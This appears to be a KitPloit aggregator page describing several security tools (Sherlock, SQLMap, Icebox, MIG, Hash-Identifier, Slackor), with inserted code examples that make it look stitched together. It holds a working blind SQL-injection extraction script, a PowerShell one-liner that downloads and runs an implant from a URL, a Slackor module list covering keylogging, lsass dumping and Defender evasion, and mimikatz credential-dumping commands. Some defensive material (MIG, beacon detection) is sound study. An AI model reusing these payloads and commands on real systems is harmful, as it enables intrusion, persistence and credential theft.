Channel: KitPloit - PenTest Tools!

Sherlock - Find Usernames Across Social Networks


Find usernames across social networks



Installation
NOTE: Python 3.6 or higher is required.
# clone the repo
$ git clone https://github.com/sherlock-project/sherlock.git

# change the working directory to sherlock
$ cd sherlock

# install python3 and python3-pip first if they are not already present

# install the requirements
$ pip3 install -r requirements.txt

Usage
$ python3 sherlock.py --help
usage: sherlock.py [-h] [--version] [--verbose] [--rank]
[--folderoutput FOLDEROUTPUT] [--output OUTPUT] [--tor]
[--unique-tor] [--csv] [--site SITE_NAME]
[--proxy PROXY_URL] [--json JSON_FILE]
USERNAMES [USERNAMES ...]

Sherlock: Find Usernames Across Social Networks (Version 0.6.4)

positional arguments:
USERNAMES One or more usernames to check with social networks.

optional arguments:
-h, --help show this help message and exit
--version Display version information and dependencies.
--verbose, -v, -d, --debug
Display extra debugging information and metrics.
--rank, -r Present websites ordered by their Alexa.com global
rank in popularity.
--folderoutput FOLDEROUTPUT, -fo FOLDEROUTPUT
If using multiple usernames, the output of the results
will be saved at this folder.
--output OUTPUT, -o OUTPUT
If using single username, the output of the result
will be saved at this file.
--tor, -t Make requests over TOR; increases runtime; requires
TOR to be installed and in system path.
--unique-tor, -u Make requests over TOR with new TOR circuit after each
request; increases runtime; requires TOR to be
installed and in system path.
--csv Create Comma-Separated Values (CSV) File.
--site SITE_NAME Limit analysis to just the listed sites. Add multiple
options to specify more than one site.
--proxy PROXY_URL, -p PROXY_URL
Make requests over a proxy. e.g.
socks5://127.0.0.1:1080
--json JSON_FILE, -j JSON_FILE
Load data from a JSON file or an online, valid, JSON
file.
--print-found
Prints only found messages. Errors, and invalid
username errors will not appear.
For example, run python3 sherlock.py user123, and all of the accounts found will be stored in a text file named after the username (e.g. user123.txt).
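The detection logic behind the options above, as an added example (this is not Sherlock's own code): a site table in the shape of Sherlock's data.json entries drives one check per site, covering the three ways a "no such user" page can be recognised (status code, error message in the body, redirect to a known error URL). The site names, URLs and the fake_fetch responses are constructed for this example; a real run would replace fake_fetch with an HTTP client that follows redirects.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, Tuple

# Constructed site table in the shape of Sherlock's data.json entries: a URL template plus the
# errorType that tells the checker how a "no such user" page looks. The site names and URLs are
# invented for this example (.invalid never resolves).
SITES = {
    "ExampleHub": {
        "url": "https://examplehub.invalid/{}",
        "errorType": "status_code",          # missing user -> non-2xx status
    },
    "ExampleBlog": {
        "url": "https://exampleblog.invalid/u/{}",
        "errorType": "message",              # missing user -> 200 with an error string in the body
        "errorMsg": "Sorry, this page doesn't exist",
    },
    "ExampleForum": {
        "url": "https://exampleforum.invalid/{}",
        "errorType": "response_url",         # missing user -> redirect to a known error URL
        "errorUrl": "https://exampleforum.invalid/404",
    },
}

# fetch(url) -> (status_code, body, final_url after redirects). Injected so the example runs
# offline; a real run would wrap requests.get(url, allow_redirects=True).
Fetcher = Callable[[str], Tuple[int, str, str]]


@dataclass
class Result:
    site: str
    url: str
    exists: bool


def valid_username(username: str) -> bool:
    # Only names that can be a single URL path segment are worth querying.
    return re.fullmatch(r"[A-Za-z0-9_.-]{1,64}", username) is not None


def check_site(site: str, username: str, fetch: Fetcher) -> Result:
    meta = SITES[site]
    url = meta["url"].format(username)
    status, body, final_url = fetch(url)
    kind = meta["errorType"]
    if kind == "status_code":
        exists = 200 <= status < 300
    elif kind == "message":
        exists = status == 200 and meta["errorMsg"] not in body
    elif kind == "response_url":
        exists = status == 200 and final_url.rstrip("/") != meta["errorUrl"].rstrip("/")
    else:
        raise ValueError(f"unknown errorType {kind!r} for {site}")
    return Result(site, url, exists)


def find_username(username: str, fetch: Fetcher) -> Dict[str, Result]:
    """Check one username against every site; returns a result per site (found or not)."""
    if not valid_username(username):
        raise ValueError(f"{username!r} is not a usable URL path segment")
    return {site: check_site(site, username, fetch) for site in SITES}


def fake_fetch(url: str) -> Tuple[int, str, str]:
    """Constructed responses standing in for the network: 'alice' has an account everywhere,
    every other name is missing everywhere."""
    if url.rstrip("/").endswith("/alice"):
        return 200, "<h1>alice</h1>", url
    if url.startswith("https://examplehub.invalid/"):
        return 404, "Not Found", url
    if url.startswith("https://exampleblog.invalid/"):
        return 200, "Sorry, this page doesn't exist", url
    return 200, "<h1>Error</h1>", "https://exampleforum.invalid/404"


if __name__ == "__main__":
    for r in find_username("alice", fake_fetch).values():
        print(f"[{'+' if r.exists else '-'}] {r.site}: {r.url}")
```

The response_url case is the one that most often produces false positives in practice: a site that starts redirecting every profile through a login page will make every username look present, which is why Sherlock's site table needs constant maintenance.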

Docker Notes
If you have docker installed you can build an image and run this as a container.
docker build -t mysherlock-image .
Once the image is built sherlock can be invoked by running the following:
docker run --rm mysherlock-image user123
The optional --rm flag removes the container filesystem on completion to prevent cruft build-up. See https://docs.docker.com/engine/reference/run/#clean-up---rm
One caveat: the output text file is created inside the container, so it is gone when the container is removed unless you mount a host directory into the container and write the output there.
Or you can simply use "Docker Hub" to run sherlock:
docker run theyahya/sherlock user123

Adding New Sites
Please look at the Wiki entry on adding new sites to understand the issues.

Tests
If you are contributing to Sherlock, then Thank You!
Before creating a pull request with new development, please run the tests to ensure that all is well. It would also be a good idea to run the tests before starting development to distinguish problems between your environment and the Sherlock software.
The following is an example of the command line to run all the tests for Sherlock. This invocation hides the progress text that Sherlock normally outputs, and instead shows the verbose output of the tests.
$ python3 -m unittest tests.all --buffer --verbose
Note that we do currently have 100% test coverage. Unfortunately, some of the sites that Sherlock checks are not always reliable, so it is not uncommon to get response errors.



SQLMap v1.3.7 - Automatic SQL Injection And Database Takeover Tool


SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the experienced penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
  • Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.
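The boolean-based blind technique from the feature list, worked through as an added example (this is not sqlmap's code): a deliberately vulnerable lookup against an in-memory SQLite database, its parameterised fix, and an extraction loop that recovers a password hash using nothing but yes/no answers. The table, rows and hash values are constructed for the example.

```python
import sqlite3
from typing import Callable


def build_target() -> sqlite3.Connection:
    """Constructed target: an in-memory SQLite database standing in for a web app's backend."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pwhash TEXT)")
    con.executemany(
        "INSERT INTO users (name, pwhash) VALUES (?, ?)",
        [("admin", "5f4dcc3b5aa765d61d8327deb882cf99"), ("bob", "e10adc3949ba59abbe56e057f20f883e")],
    )
    return con


def vulnerable_user_exists(con: sqlite3.Connection, name: str) -> bool:
    """Deliberately vulnerable: user input is spliced into the SQL text. The only thing the
    caller learns is a yes/no, which is exactly what boolean-based blind injection works with."""
    sql = f"SELECT 1 FROM users WHERE name = '{name}'"
    return con.execute(sql).fetchone() is not None


def safe_user_exists(con: sqlite3.Connection, name: str) -> bool:
    """Hardened form: a bound parameter, so the input is compared as data and never parsed as SQL."""
    return con.execute("SELECT 1 FROM users WHERE name = ?", (name,)).fetchone() is not None


def blind_extract(oracle: Callable[[str], bool], subquery: str, max_len: int = 128) -> str:
    """Recover the single-row result of `subquery` using only true/false answers.

    oracle(payload) must return True when the injected WHERE clause holds. Each character is
    located by binary search over its code point (7 oracle calls instead of up to 128), the
    same trick sqlmap uses to keep blind extraction fast. UNICODE() of an empty string is
    NULL in SQLite, so every comparison fails once we read past the end, which ends the loop."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            payload = f"admin' AND UNICODE(SUBSTR(({subquery}),{pos},1)) > {mid} -- "
            if oracle(payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


def demo() -> dict:
    con = build_target()
    calls = 0

    def oracle(payload: str) -> bool:
        nonlocal calls
        calls += 1
        return vulnerable_user_exists(con, payload)

    leaked = blind_extract(oracle, "SELECT pwhash FROM users WHERE name = 'admin'")
    return {
        "leaked_hash": leaked,
        "oracle_calls": calls,
        "tautology_bypasses_vulnerable": vulnerable_user_exists(con, "x' OR '1'='1"),
        "tautology_bypasses_safe": safe_user_exists(con, "x' OR '1'='1"),
    }


if __name__ == "__main__":
    print(demo())
```

The 32-character hash costs 33 × 7 = 231 requests here (the last seven detect the end of the string). Against a real target the same loop needs one HTTP request per oracle call, which is why sqlmap prefers error-based or UNION techniques when they are available and falls back to blind ones only when they are not.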

Installation
You can download the latest tarball by clicking here or latest zipball by clicking here.
Preferably, you can download sqlmap by cloning the Git repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.

Usage
To get a list of basic options and switches use:
python sqlmap.py -h
To get a list of all options and switches use:
python sqlmap.py -hh
You can find a sample run here. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the user's manual.

Demo

Links

Translations


Icebox - Virtual Machine Introspection, Tracing & Debugging


Icebox is a Virtual Machine Introspection solution that enables you to stealthily trace and debug any process (kernel or user). It is based on the Winbagility project.
Files which might be helpful:

Demo


Project Organisation

Getting Started
Some samples have been written in the samples folder.
You can build them with these instructions after you have installed the requirements.
If you are using a Windows guest you might want to set the environment variable _NT_SYMBOL_PATH to a folder that contains your guest's PDB files. Please note that Icebox setup will fail if it does not find your guest's kernel PDB.
vm_resume:
vm_resume just pauses and then resumes your VM.
cd icebox/bin/$ARCH/
./vm_resume <vm_name>
nt_writefile:
nt_writefile breaks when a process calls ntdll!NtWriteFile, and dumps what's written in a file on your host in the current directory.
cd icebox/bin/$ARCH/
./nt_writefile <vm_name> <process_name>
heapsan:
heapsan breaks on ntdll memory allocations from a process and adds padding before and after every pointer. It is still incomplete and doesn't do any checks yet.
cd icebox/bin/$ARCH/
./heapsan <vm_name> <process_name>
wireshark:
wireshark breaks when the ndis driver reads or sends network packets and creates a Wireshark trace (.pcapng). Each packet sent is associated with a call stack from kernel land to user land where applicable.
cd icebox/bin/$ARCH/
./wireshark <name> <path_to_capture_file>


MIG - Distributed And Real Time Digital Forensics At The Speed Of The Cloud


MIG is Mozilla's platform for investigative surgery of remote endpoints.

Quick Start w/ Docker
You can spin up a local-only MIG setup using docker. The container is not suitable for production use but lets you experiment with MIG quickly, providing a single container environment that has most of the MIG components available.
To pull from Docker Hub:
$ docker pull mozilla/mig
$ docker run -it mozilla/mig
Or, if you have the source checked out in your GOPATH you can build your own image:
$ cd $GOPATH/src/github.com/mozilla/mig
$ docker build -t mozilla/mig:latest .
$ docker run -it mozilla/mig
Once inside the container, you can use the MIG tools to query a local agent, as such:
mig@5345268590c8:~$ /go/bin/mig file -t all -path /usr/bin -sha2 5c1956eba492b2c3fffd8d3e43324b5c477c22727385be226119f7ffc24aad3f
1 agents will be targeted. ctrl+c to cancel. launching in 5 4 3 2 1 GO
Following action ID 7978299359234.
1 / 1 [=========================================================] 100.00% 0/s4s
100.0% done in 3.029105958s
1 sent, 1 done, 1 succeeded
ed11f485244a /usr/bin/wget [lastmodified:2016-07-05 15:32:42 +0000 UTC, mode:-rwxr-xr-x, size:419080] in search 's1'
1 agent has found results
To explore the capabilities of MIG, take a look at the CheatSheet.

What is this?
MIG is composed of agents installed on all systems of an infrastructure that can be queried in real time to investigate the file systems, network state, memory or configuration of endpoints.

Capability           Linux      MacOS      Windows
file inspection      yes        yes        yes
network inspection   yes        yes        (partial)
memory inspection    yes        yes        yes
vuln management      yes        (planned)  (planned)
log analysis         (planned)  (planned)  (planned)
system auditing      yes        (planned)  (planned)
Imagine it is 7am on a saturday morning, and someone just released a critical vulnerability for your favorite PHP application. The vuln is already exploited and security groups are releasing indicators of compromise (IOCs). Your weekend isn't starting great, and the thought of manually inspecting thousands of systems isn't making it any better.
MIG can help. The signature of the vulnerable PHP app (the md5 of a file, a regex, or just a filename) can be searched for across all your systems using the file module. Similarly, IOCs such as specific log entries, backdoor files with md5 and sha1/2/3 hashes, IP addresses from botnets or byte strings in process memory can be investigated using MIG. Suddenly, your weekend is looking a lot better. And with just a few commands, thousands of systems will be remotely investigated to verify that you're not at risk.
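What a file-module question like the one in the quick start amounts to on the endpoint, as an added example written in Python (MIG itself is Go; this is not MIG code): a search with path, name, hash and content criteria run over a constructed directory tree, returning only the matching paths and nothing else. The tree, the webshell bytes and the log lines are constructed for this example.

```python
import hashlib
import os
import re
import stat
import tempfile
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class FileSearch:
    """One question to ask of the file system, in the spirit of `mig file -path ... -sha2 ...`."""
    path: str
    name: Optional[str] = None      # regex matched against the file name
    sha256: Optional[str] = None    # hex digest the whole file must hash to
    content: Optional[str] = None   # regex searched inside the file
    maxdepth: int = 8


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def run_search(s: FileSearch) -> List[str]:
    """Walk s.path and return only the paths matching every criterion. Nothing else leaves this
    function: no contents, no hashes of non-matching files, which is the 'answer questions, do
    not ship raw data' property MIG's agents are built around."""
    name_re = re.compile(s.name) if s.name else None
    content_re = re.compile(s.content.encode()) if s.content else None
    want_hash = s.sha256.lower() if s.sha256 else None
    root_depth = os.path.abspath(s.path).count(os.sep)
    hits: List[str] = []
    for dirpath, dirnames, filenames in os.walk(s.path):
        if os.path.abspath(dirpath).count(os.sep) - root_depth >= s.maxdepth:
            dirnames[:] = []                       # stop descending
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue                           # symlinks, sockets, devices are skipped
            if name_re and not name_re.search(fn):
                continue
            if want_hash and sha256_of(full) != want_hash:
                continue
            if content_re:
                with open(full, "rb") as f:
                    if not content_re.search(f.read()):
                        continue
            hits.append(os.path.relpath(full, s.path))
    return sorted(hits)


WEBSHELL = b"<?php @eval($_POST['cmd']); ?>\n"        # constructed IOC, not a real sample


def build_tree() -> str:
    """Constructed directory tree: a benign script, a backdoor, and a log holding a C2 address."""
    root = tempfile.mkdtemp(prefix="mig-demo-")
    os.makedirs(os.path.join(root, "var/www/html/cache"))
    os.makedirs(os.path.join(root, "var/log"))
    with open(os.path.join(root, "var/www/html/index.php"), "wb") as f:
        f.write(b"<?php echo 'hello'; ?>\n")
    with open(os.path.join(root, "var/www/html/cache/.c.php"), "wb") as f:
        f.write(WEBSHELL)
    with open(os.path.join(root, "var/log/access.log"), "wb") as f:
        f.write(b'203.0.113.9 - - "GET /index.php" 200\n198.51.100.7 - - "POST /cache/.c.php" 200\n')
    return root


def demo() -> Dict[str, List[str]]:
    root = build_tree()
    return {
        "by_hash": run_search(FileSearch(root, sha256=hashlib.sha256(WEBSHELL).hexdigest())),
        "by_name_and_content": run_search(FileSearch(root, name=r"\.php$", content=r"eval\(\$_POST")),
        "ioc_in_logs": run_search(FileSearch(root, name=r"\.log$", content=r"198\.51\.100\.7")),
    }


if __name__ == "__main__":
    for question, answer in demo().items():
        print(question, "->", answer)
```

Order the criteria cheapest first when you write a real agent module: the name regex costs nothing, hashing reads every byte of every candidate, and a content regex on large files is the slowest, so a hash or content search should always be narrowed by path and name first.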


MIG agents are designed to be lightweight, secure, and easy to deploy so you can ask your favorite sysadmins to add it to a base deployment without fear of breaking the entire production network. All parameters are built into the agent at compile time, including the list and ACLs of authorized investigators. Security is enforced using PGP keys, and even if MIG's servers are compromised, as long as your keys are safe on your investigators' laptops, no one will break into the agents.
MIG is designed to be fast, and asynchronous. It uses AMQP to distribute actions to endpoints, and relies on Go channels to prevent components from blocking. Running actions and commands are stored in a Postgresql database and on disk cache, such that the reliability of the platform doesn't depend on long-running processes.
Speed is a strong requirement. Most actions will only take a few hundreds milliseconds to run on agents. Larger ones, for example when looking for a hash in a big directory, should run in less than a minute or two. All in all, an investigation usually completes in between 10 and 300 seconds.
Privacy and security are paramount. Agents never send raw data back to the platform, but only reply to questions instead. All actions are signed by GPG keys that are not stored in the platform, thus preventing a compromise from taking over the entire infrastructure.

Technology
MIG is built in Go and uses a REST API that receives signed JSON messages distributed to agents via RabbitMQ and stored in a Postgres database.
It is:
  • Massively Distributed means Fast.
  • Simple to deploy and Cross-Platform.
  • Secured using OpenPGP.
  • Respectful of privacy by never retrieving raw data from endpoints.
Check out this 10 minutes video for a more general presentation and a demo of the console interface.


MIG was recently presented at the SANS DFIR Summit in Austin, Tx. You can watch the recording below:


Discussion
Join #mig on irc.mozilla.org (use a web client such as mibbit).

Documentation
All documentation is available in the 'doc' directory and on http://mig.mozilla.org .


Hash-Identifier - Software To Identify The Different Types Of Hashes Used To Encrypt Data And Especially Passwords


Software to identify the different types of hashes used to protect data, and especially passwords (these are one-way digests, not encryption: they are recovered by guessing and recomputing, not by decrypting).
Hash formats supported:
  • ADLER-32
  • CRC-32
  • CRC-32B
  • CRC-16
  • CRC-16-CCITT
  • DES(Unix)
  • FCS-16
  • GHash-32-3
  • GHash-32-5
  • GOST R 34.11-94
  • Haval-160
  • Haval-192
  • Haval-224
  • Haval-256
  • Lineage II C4
  • Domain Cached Credentials
  • XOR-32
  • MD5(Half)
  • MD5(Middle)
  • MySQL
  • MD5(phpBB3)
  • MD5(Unix)
  • MD5(Wordpress)
  • MD5(APR)
  • Haval-128
  • MD2
  • MD4
  • MD5
  • MD5(HMAC(Wordpress))
  • NTLM
  • RAdmin v2.x
  • RipeMD-128
  • SNEFRU-128
  • Tiger-128
  • MySQL5 - SHA-1(SHA-1($pass))
  • MySQL 160bit - SHA-1(SHA-1($pass))
  • RipeMD-160
  • SHA-1
  • SHA-1(MaNGOS)
  • Tiger-160
  • Tiger-192
  • md5($pass.$salt) - Joomla
  • SHA-1(Django)
  • SHA-224
  • RipeMD-256
  • SNEFRU-256
  • SAM - (LM_hash:NT_hash)
  • SHA-256(Django)
  • RipeMD-320
  • SHA-384
  • SHA-256
  • SHA-384(Django)
  • SHA-512
  • Whirlpool
  • And more...

Some formats cannot be told apart from the hash string alone (for instance, any unsalted 32-character hexadecimal value could be MD5, MD4, NTLM or several others), so the tool lists candidates and the final call depends on where the hash came from, which only the user knows.
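A length-and-structure classifier in the spirit of the list above, as an added example (this is not hash-identifier's code): prefixed or delimited formats are resolved by pattern, bare hex digests are only bucketed by length, and the result is a candidate list so the ambiguity described in the note stays visible. The regexes are written from the usual format conventions; the Joomla salt length is an assumption. Of the sample hashes in the usage section, the $1$ value is constructed; the others are the well-known digests of "password" (MD5, MySQL5) and of the empty string (LM and NT, SHA-1).

```python
import re
from typing import List

# Formats with a recognisable structure (prefix, separator or fixed salt layout). The regexes are
# this example's own, written from the format conventions; they are not hash-identifier's code.
STRUCTURED = [
    (r"^\$1\$[^$]{1,8}\$[./0-9A-Za-z]{22}$", "MD5(Unix)"),
    (r"^\$apr1\$[^$]{1,8}\$[./0-9A-Za-z]{22}$", "MD5(APR)"),
    (r"^\$H\$[./0-9A-Za-z]{31}$", "MD5(phpBB3)"),
    (r"^\$P\$[./0-9A-Za-z]{31}$", "MD5(Wordpress)"),
    (r"^\*[0-9A-Fa-f]{40}$", "MySQL5 - SHA-1(SHA-1($pass))"),
    (r"^sha1\$[^$]*\$[0-9a-f]{40}$", "SHA-1(Django)"),
    (r"^sha256\$[^$]*\$[0-9a-f]{64}$", "SHA-256(Django)"),
    (r"^sha384\$[^$]*\$[0-9a-f]{96}$", "SHA-384(Django)"),
    (r"^[0-9A-Fa-f]{32}:[0-9A-Fa-f]{32}$", "SAM - (LM_hash:NT_hash)"),
    (r"^[0-9a-f]{32}:[^:\s]{16,32}$", "md5($pass.$salt) - Joomla"),   # hash:salt; salt length assumed
    (r"^[./0-9A-Za-z]{13}$", "DES(Unix)"),
]

# Unsalted digests can only be bucketed by length; every name in a bucket is an equal candidate.
BY_HEX_LENGTH = {
    4: ["CRC-16", "CRC-16-CCITT", "FCS-16"],
    8: ["CRC-32", "CRC-32B", "ADLER-32", "XOR-32", "GHash-32-3", "GHash-32-5"],
    16: ["MySQL", "MD5(Half)", "MD5(Middle)"],
    32: ["MD5", "MD4", "MD2", "NTLM", "Domain Cached Credentials", "Haval-128", "RipeMD-128",
         "SNEFRU-128", "Tiger-128", "Lineage II C4", "RAdmin v2.x"],
    40: ["SHA-1", "RipeMD-160", "Haval-160", "Tiger-160",
         "MySQL 160bit - SHA-1(SHA-1($pass))", "SHA-1(MaNGOS)"],
    48: ["Tiger-192", "Haval-192"],
    56: ["SHA-224", "Haval-224"],
    64: ["SHA-256", "RipeMD-256", "Haval-256", "SNEFRU-256", "GOST R 34.11-94"],
    80: ["RipeMD-320"],
    96: ["SHA-384"],
    128: ["SHA-512", "Whirlpool"],
}


def identify_hash(value: str) -> List[str]:
    """Return candidate formats for one hash string. A single candidate means the structure gave
    it away; several mean only the length is known and the user has to decide from context
    (where the hash came from, which application wrote it)."""
    value = value.strip()
    for pattern, name in STRUCTURED:
        if re.match(pattern, value):
            return [name]
    if re.fullmatch(r"[0-9A-Fa-f]+", value):
        return list(BY_HEX_LENGTH.get(len(value), []))
    return []


if __name__ == "__main__":
    for h in ["5f4dcc3b5aa765d61d8327deb882cf99",            # md5("password"): ambiguous
              "$1$saltsalt$qjXMvbEw8oaL.CzflDtaK/",           # constructed md5crypt layout
              "*94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29"]:   # MySQL5 PASSWORD("password")
        print(h, "->", identify_hash(h))
```

When a bucket comes back with several names, pick by provenance rather than by guessing: a 32-hex value pulled from an NTDS.dit dump is NTLM, the same string from a PHP application's users table is almost certainly MD5.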


Slackor - A Golang Implant That Uses Slack As A Command And Control Server

A Golang implant that uses Slack as a command and control channel.
This project was inspired by Gcat and Twittor.






This tool is released as a proof of concept. Be sure to read and understand the Slack App Developer Policy before creating any Slack apps.

Setup
Note: The server is written in Python 3
For this to work you need:
  • A Slack Workspace
  • Register an app with the following permissions:
    • channels:read
    • channels:history
    • channels:write
    • files:write:user
    • files:read
  • Create a bot
This repo contains five files:
  • install.sh Installs dependencies
  • setup.py The script to create the Slack channels, database, and implant
  • server.py The Slackor server, designed to be run on Linux
  • template.go Template for the generated implant
  • requirements.txt Python dependencies (installed automatically)
To get started:
  • Run install.sh
  • Run setup.py
    • Supply the OAuth Access Token and Bot User OAuth Access Token from your app
After running the script successfully, a file agent.exe will be created. It will be a 64-bit Go binary packed with UPX.
After starting server.py on a Linux host, execute agent.exe on your target Windows host.
Run the "stager" module to generate a one-liner and other droppers.
powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe /c C:\Users\Public\[NAME]; timeout 2; del C:\Users\Public\[NAME].exe
This uses Invoke-WebRequest (the iwr alias; PowerShell 3 and later) to download the payload, launches it through forfiles.exe (a Windows LOLBin), and deletes the dropped binary once the process is killed. This is a working example, but the command can be tweaked to use another download or execution method.

Usage
Type "help" or press [TAB] to see a list of available commands. Type "help [COMMAND]" to see a description of that command.
(Slackor)
  • help - Displays help menu
  • interact - Interact with an agent
  • list - List all registered agents
  • remove - kill and remove an agent
  • revive - Sends a signal to all agents to re-register with the server
  • stager - Generates a one-liner to download and execute the implant
  • quit - Quit the program
  • wipefiles - Deletes all uploaded files out of Slack
Once an agent checks in, you can interact with it. Use "interact [AGENT]" to enter an agent prompt. Type "help" or press [TAB] to see a list of available commands.
(Slackor:AGENT)
  • back - Return to the main menu
  • beacon - change the amount of time between each check-in by an agent (default is 5 seconds)
  • bypassuac - Attempts to spawn a high integrity agent
  • cleanup - Removes persistence artifacts
  • clipboard - Retrieves the contents of the clipboard
  • defanger - Attempts to de-fang Windows Defender
  • download - Download a file from the agent to the Slackor server
  • duplicate - Causes the agent to spawn another invocation of itself
  • getsystem - Spawns an agent as NT AUTHORITY\SYSTEM
  • help - Displays help menu
  • keyscan - Starts a keylogger on the agent
  • kill - Kill the agent
  • minidump - Dumps memory from lsass.exe and downloads it
  • persist - Creates persistence by implanting a binary in an ADS
  • samdump - Attempts to dump the SAM file for offline hash extraction
  • screenshot - Takes a screenshot of the desktop and retrieves it
  • shellcode - Executes x64 raw shellcode
  • sleep - Cause the agent to sleep once (enter time in seconds)
  • sysinfo - Displays the current user, OS version, system architecture, and number of CPU cores
  • upload - Upload a file to the agent from the Slackor server
  • wget - Pull down arbitrary files over HTTP/HTTPS

OPSEC Considerations
Command output and downloaded files are AES encrypted in addition to TLS transport encryption.
Modules will warn you before performing tasks that write to disk.
When executing shell commands, take note that cmd.exe will be executed. This may be monitored on the host. Here are several OPSEC safe commands that will NOT execute cmd.exe:
  • cat - prints file content
  • cd - change directory
  • hostname - Displays the name of the host
  • ifconfig - Displays interface information
  • ls - list directory contents
  • mkdir - Creates a directory
  • pwd - prints the current working directory
  • rm - removes a file
  • rmdir - removes a directory
  • whoami / getuid - prints the current user

Credits

Future goals

FAQ:
Is this safe to use for red teams/pentesting?
Yes, given some conditions. While the data is encrypted in transit, the agent contains the key for decryption. Anyone who acquires a copy of the agent could reverse engineer it and extract the API keys and the AES secret key. Anyone who compromises or otherwise gains access to the workspace would be able to retrieve all data within it. For this reason, it is not recommended to re-use infrastructure against multiple organizations.
What about Mimikatz?
The implant does not have in-memory password dumping functionality. If you need logonPasswords, you can try the following:
(Slackor:AGENT) minidump
This will automatically extract passwords from the dump with pypykatz. Alternatively, you can use Mimikatz on Windows:
>mimikatz.exe
mimikatz # sekurlsa::Minidump lsassdump.dmp
mimikatz # sekurlsa::logonPasswords
Is it cross-platform?
Not yet. It has not been fully tested on a variety of systems. The server was designed to run on Kali Linux and the agent on Windows 10.
How well does it scale?
Scalability is limited by the Slack API. If you have multiple agents, consider increasing the beacon interval of beacons not in use.
Is it vulnerable to standard beacon analysis?
Currently each beacon has 20% jitter built in, and beacon times can be customized. Agent check-in request and response packets will be about the same size each time as long as no new commands are received.
Why did you do [x] when a better way to do it is [y]?
I tried my best. PRs are encouraged :)
It gets caught by AV!
The built-in HTA stager is created by SpookFlare which is based on Demiguise. If you want your droppers to not get snagged you probably want to go custom. The built in droppers are just there to get you started.
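The beacon-analysis question in the FAQ, seen from the defender's side as an added example (this is not part of Slackor): constructed proxy-log lines for a 5 second check-in with ±20% jitter next to a human browsing pattern against the same host, grouped per client and destination and scored on inter-arrival regularity. The log format, addresses and thresholds are this example's own assumptions.

```python
import random
import statistics
from collections import defaultdict
from typing import Dict, List, Tuple


def constructed_proxy_log(seed: int = 7) -> List[str]:
    """Constructed web-proxy lines: '<epoch> <client> <host>'. One client talks to slack.com on a
    5 s beacon with +/-20% jitter (the agent's default above); another browses it like a person."""
    rng = random.Random(seed)
    lines = []
    t = 1_700_000_000.0
    for _ in range(200):                       # implant: 5 s * U(0.8, 1.2)
        lines.append(f"{t:.3f} 10.0.0.23 slack.com")
        t += 5.0 * rng.uniform(0.8, 1.2)
    t = 1_700_000_000.0
    for _ in range(200):                       # human: bursty, heavy-tailed gaps
        lines.append(f"{t:.3f} 10.0.0.42 slack.com")
        t += rng.expovariate(1 / 30)
    rng.shuffle(lines)                         # logs are rarely sorted per client
    return lines


def interval_stats(timestamps: List[float]) -> Dict[str, float]:
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    mean = statistics.mean(gaps)
    return {
        "count": len(gaps),
        "median_gap": statistics.median(gaps),
        # coefficient of variation: uniform +/-20% jitter gives ~0.12, human traffic is near 1.0
        "cv": statistics.pstdev(gaps) / mean if mean else float("inf"),
    }


def find_beacons(lines: List[str], min_events: int = 20,
                 max_cv: float = 0.3) -> Dict[Tuple[str, str], Dict[str, float]]:
    """Group events per (client, host), score the inter-arrival regularity, and flag the regular
    ones. A fixed percentage of jitter widens the spread but does not hide the periodicity."""
    by_pair: Dict[Tuple[str, str], List[float]] = defaultdict(list)
    for line in lines:
        epoch, client, host = line.split()
        by_pair[(client, host)].append(float(epoch))
    verdicts = {}
    for pair, ts in by_pair.items():
        if len(ts) < min_events + 1:
            continue
        s = interval_stats(ts)
        s["beaconing"] = s["cv"] < max_cv
        verdicts[pair] = s
    return verdicts


if __name__ == "__main__":
    for (client, host), s in find_beacons(constructed_proxy_log()).items():
        print(f"{client} -> {host}: median {s['median_gap']:.1f}s cv {s['cv']:.2f} "
              f"beaconing={s['beaconing']}")
```

Uniform ±20% jitter has a standard deviation of only about 11.5% of the mean, so the implant's intervals stay tightly clustered around 5 seconds; the constant-size check-ins the FAQ mentions are a second regularity a defender can score the same way.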


Fbchecker - Facebook Mass Account Checker


